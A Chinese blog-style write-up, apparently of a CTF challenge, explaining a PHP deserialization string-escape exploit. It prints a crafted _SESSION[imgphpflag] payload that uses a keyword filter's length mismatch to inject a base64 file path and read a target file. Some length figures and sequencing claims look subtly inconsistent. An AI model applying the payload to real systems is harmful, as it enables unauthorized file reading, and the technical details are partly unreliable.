变量覆盖冲突与构造字符串逃逸漏洞

在PHP反序列化漏洞利用场景中,使用_SESSION[imgphpflag]而非_SESSION[img]的核心技术原理在于规避变量覆盖冲突与构造字符串逃逸漏洞。该设计基于对PHP序列化机制和会话管理逻辑的深度解析。

技术原理深度剖析

1. 变量覆盖冲突规避机制

代码中存在关键赋值语句$_SESSION['img'] = base64_encode('guest_img.png'),该操作在会话初始化阶段执行。若直接通过POST方式提交_SESSION[img]参数,将触发以下冲突:

php 复制代码
// 代码执行时序分析
$_SESSION['img'] = base64_encode('guest_img.png');  // 初始赋值
extract($_POST);                                    // POST参数提取
// 若存在_POST['_SESSION']['img'],将覆盖前值

通过采用非常规键名imgphpflag,有效绕过了该变量覆盖风险。在PHP会话处理中,_SESSION超全局数组的键名具有唯一性,使用差异化键名确保了构造的payload不会被后续赋值操作覆盖。

2. 字符串逃逸漏洞构造原理

关键漏洞点在于filter函数的字符过滤机制:

php 复制代码
$serialize_info = filter(serialize($_SESSION));
// filter函数将"php"和"flag"替换为空字符串

当序列化字符串中的键名包含被过滤词汇时,会产生长度计算偏差:

  • 原始序列化字符串:s:10:"imgphpflag";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
  • 过滤后变为:s:10:"img";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

此时PHP反序列化器将按照声明的长度10读取键名,实际键名img仅3个字符,导致向后多读取7个字符";s:71:",形成键名截断。这种长度声明与实际内容的错位,正是字符串逃逸漏洞的技术本质。

技术实现对比分析

参数方案 技术风险 可行性 实现复杂度
_SESSION[img] 高(变量覆盖) 不可行
_SESSION[imgphpflag] 低(规避冲突) 可行

攻击载荷构造技术细节

完整攻击链的构造需要严格遵循PHP序列化格式规范:

php 复制代码
// 原始SESSION结构
array(
    'imgphpflag' => ';s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}'
);

// 序列化后格式
a:1:{s:10:"imgphpflag";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}

在filter函数处理过程中,键名imgphpflag被过滤为img,但长度声明保持10不变,形成:

php 复制代码
a:1:{s:10:"img";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}
//        ↑ 声明长度10  实际内容"img"仅3字符,产生7字符溢出

这种精确定位的字符溢出使得后续的";s:3:"img"被正确解析为新的键值对,最终通过file_get_contents(base64_decode($userinfo['img']))成功读取目标文件。

该技术方案充分体现了对PHP反序列化机制深度理解的必要性,在安全测试场景中,类似的字符过滤与长度校验不匹配问题已成为反序列化漏洞的典型攻击向量。


参考来源

相关推荐
两个人的幸福9 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
BingoGo11 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack11 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820712 天前
PHP 扩展——从入门到理解
php
鹏仔先生12 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作
php
云水一下13 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建
开发语言·php
xingpanvip13 天前
星盘接口开发文档:本命盘接口指南
android·开发语言·css·php·lua
酉鬼女又兒13 天前
零基础入门计算机网络运输层:端到端通信核心作用、端口号分类规则、复用分用工作机制及UDP与TCP协议全方位对比详解
网络·网络协议·tcp/ip·计算机网络·考研·udp·php
dog25013 天前
不要再继续优化 TCP
网络协议·tcp/ip·php
Channing Lewis13 天前
PHP 解析 Excel 的那些坑:一次“行号错位”引发的数据丢失
开发语言·php·excel